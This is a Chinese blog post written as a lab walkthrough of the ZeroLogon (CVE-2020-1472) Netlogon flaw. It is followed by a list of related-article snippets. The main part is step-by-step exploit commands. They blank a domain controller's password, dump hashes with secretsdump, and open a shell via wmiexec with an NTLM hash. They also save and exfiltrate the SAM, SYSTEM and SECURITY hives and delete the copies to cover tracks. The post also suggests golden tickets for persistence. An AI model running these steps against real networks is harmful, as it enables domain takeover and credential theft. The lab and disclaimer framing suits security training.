域渗透ZeroLogon(CVE-2020-1472)

最新推荐文章于 2025-03-26 00:45:00 发布
最新推荐文章于 2025-03-26 00:45:00 发布
阅读量3.1k 收藏 7
点赞数
分类专栏: 内网域环境 文章标签: 安全 web安全 渗透测试 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/nicai321/article/details/122726971
版权

文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

CVE-2020-1472-ZeroLogon

原理:

Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空。
简单来说:就是攻击者可以利用这个漏洞将域控密码设置为空。从而导出hash,掌握域控。

漏洞复现:

可以先使用脚本进行验证漏洞是否存在:

python3 zerologon_tester.py ad01 10.10.10.137 #这里需要两个参数 域控名 和 域控IP

这里可以看出漏洞存在。
在这里插入图片描述
使用exp将域控密码设置为空:

python3 cve-2020-1472-exploit.py ad01 10.10.10.137 #同样是域控名 和域控IP

在这里插入图片描述
使用impacket包中的secretsdum.py来获取相关的HASH:

python3 secretsdump.py redteam.club/ad01\$@10.10.10.137 -no-pass #分别需要参数域名/域控名\$@域控IP -no-pass 不需要密码

在这里插入图片描述
获取hash后,利用wmiexec脚本登陆,获取shell:

python wmiexec.py -hashes <HASH> DOMAIN/DOMAIN_USER@DC_IP_ADDR #使用方法
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:747f92f9bf20a4fc930afc4dadf53bdc redteam.club/administrator@10.10.10.137

在这里插入图片描述
这些命令的意思就是通过注册表将带有hash的文件进行保存下来,然后发送到我们攻击机本地, 然后删除原本保存的文件:

reg save HKLM\SYSTEM system.save 
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

在这里插入图片描述
使用脚本获取原本域控的hash:

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

这里位置就是原本域控的hash:
在这里插入图片描述

使用re脚本进行hash恢复:

python3 reinstall_original_pw.py ad01 10.10.10.137 上面的hash值

在这里插入图片描述
这里我们可以再检测下域密码:

python3 secretsdump.py ad01.redteam.club/administrator@10.10.10.137 -hashes :747f92f9bf20a4fc930afc4dadf53bdc

在这里插入图片描述
这样我们域控的hash就完成恢复;恢复之后,同样可以看到krbtgt这个账号的hash,可以利用它生成黄金票据来进行权限维持。

CVE-2020-1472域渗透 NetLogon 权限提升漏洞
千寻的博客
06-13 474
模拟环境:获取了一个加入了域的计算机权限,在system账号权限的情况下,将域管密码置空,导出域管hash,然后进行连接
内网渗透(六十四)CVE-2020-1472 NetLogon 权限提升漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-08 1008
2020年8月份微软发布的安全公告中,有一个十分紧急的漏洞——CVE-2020-1472 NetLogon 权限提升漏洞。通过该漏洞,未经身份验证的攻击者只需要能访问域控的135端口即可通过 NetLogon 远程协议连接域控并重置域控机器的Hash,从而导致攻击者可以利用域控的机器账户导出域内所有用户的Hash(域控的机器账户默认具有DCSync权限),进而接管整个域。该漏洞存在的原因是Netlogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭据的情况下通过认证。
利用ZeroLogon漏洞接管域控权限
Zlirving_的博客
02-25 2494
目录漏洞介绍实验环境实验开始进入域漏洞验证漏洞利用置空域控密码获取新凭据获取域控半交互式shell获取初始凭据(sam)还原域控密码 漏洞介绍 CVE-2020-14722 (又称ZeroLogon) 是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client challenge)、IV等要素可控的情况下,存在较高概率使得产生
zerologon:零登录漏洞CVE-2020-1472的利用
03-17
ZeroLogon开发脚本 利用基于和代码。 Secura的原始研究和扫描仪,RiskSense Inc.的修改。 要利用该漏洞,请清除您以前安装的所有Impacket,然后从或更高版本安装Impacket。 然后做: python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR 如果成功的话,您将能够: secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr' 这应该使您成为域管理员。 完成后,使用来自secretsdump的凭据将wmiexec.py转到目标DC并执行 reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SE
内网渗透 --- 利用Zerologon漏洞攻击域服务器
最新发布
浩策盾悟
03-26 4682
该漏洞允许攻击者在无需认证的情况下,通过伪造身份与域控制器(Domain Controller, DC)通信,最终实现对整个 Active Directory(AD)环境的完全控制。在内网中,攻击者通常已获得初步立足点(如通过钓鱼邮件或弱密码),Zerologon 漏洞的无需凭据特性使其成为快速提权的利器。:攻击者通过发送特定的 RPC 调用,将域控制器的计算机账户密码重置为已知值(通常为空密码),从而控制 DC。攻击目标是将域控制器的计算机账户密码重置为空,并利用空密码接管 DC。
CVE-2020-1472(zero-logon)
include_heqile的博客
11-22 397
https://mp.weixin.qq.com/s/BZ_-ud67FpUgkP48GCtBUA
探索ZeroLogon:解决Windows域控制器安全漏洞的利器
gitblog_00003的博客
04-15 588
探索ZeroLogon:解决Windows域控制器安全漏洞的利器 zerologon项目地址:https://gitcode.com/gh_mirrors/ze/zerologon 项目简介 是一个开源项目,由RiskSense公司开发并维护。该项目主要针对网络安全领域的一个重大威胁——CVE-2020-1472(也被称作“ZeroLogon”漏洞)提供检测和缓解工具。此漏洞影响了Windows...
ZeroLogon (CVE-2020-1472) 漏洞利用
热门推荐
Captain_RB的博客
10-24 1万+
ZeroLogon (CVE-2020-1472) 是近几年Windows上曝出的高危漏洞,CVSS V3.0评分10.0,攻击者只需要定位域控主机名及IP,并且可以访问域控,就可以在无需任何凭据的情况下 (可在域外) 拿到域管理员的权限。
黑客也震惊: Zerologon 接管Windows域如此简单
DynamicsAgg的博客
09-23 1317
2020年8月份微软发布了一个Netlogon 相关补丁的提醒, 很多人没有关注.直到9月份针对该漏洞的PoC出来才大呼震惊,原来该漏洞可以让黑客只需要一个TCP连接就可以轻易提权接管整个Windows 域包括域管理员密码.这个漏洞, 官方命名 CVE-2020-1472,俗名 zerologon. 什么是Net Logon (MS-NRPC)? 接触过Windows服务器端的同学应该知道, 该服务是域安全通道接口,基于微软RPC,用于确保域内/跨域 信息交互的安全性,比如域...
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9440
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
滥用CVE-2020-1472Zerologon)接管域,然后修复本地存储的机器账号密码_Python_下载.zip
04-28
标题中的"CVE-2020-1472",又称为"Zerologon",是一个严重安全漏洞,影响了微软的Netlogon身份验证协议。这个漏洞允许攻击者未经身份验证就能完全控制域控制器,从而可以访问网络中的所有资源。Zerologon2020年被...
Python脚本测试CVE-2020-1472 Zerologon漏洞
CVE-2020-1472是微软Windows Netlogon远程协议实现中的一个严重安全漏洞,通常被称为ZeroLogon漏洞。该漏洞允许攻击者无需任何有效凭证即可完全控制Windows域控制器。攻击者可以利用该漏洞进行权限提升,进而实现对...
Netlogon 特权提升漏洞(CVE-2020-1472)原理分析与验证
smellycat000的专栏
09-16 1448
聚焦源代码安全,网罗国内外最新资讯!漏洞简介CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的...
zerologon漏洞分析
灰太的表格的博客
10-16 878
zerologon漏洞分析
关于用kail打vulntarget-a靶场使用CVE-2020-1472出现的问题
tiancaikunge的博客
06-20 449
关于用kail打vulntarget-a靶场使用CVE-2020-1472出现的问题
CVE-2020-1472 ZeroLogon漏洞分析利用
mingyqf的博客
02-24 1628
CVE-2020-1472 ZeroLogon漏洞分析利用 暗影安全团队 2021-01-26 14:27:56 102316 0x01漏洞简介 CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS评分为10分。未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞,成功利用此漏洞的攻击者可获得域管理员权限。该漏洞由 Secura 公司的 Tom Tervoort 发现提交并命名为 Z
渗透测试域渗透ZeroLogon漏洞利用
没有网络安全就没有国家安全
03-13 844
渗透测试域渗透ZeroLogon漏洞利用
内网渗透:八、CVE-2020-1472 NetLogon 域内提权漏洞(域控密码置空)
liu_jia_liang的博客
03-08 5370
简介: 2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。 Netlogon远程协议是一个可用的在Windows域控制器上的RPC(remote pr...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值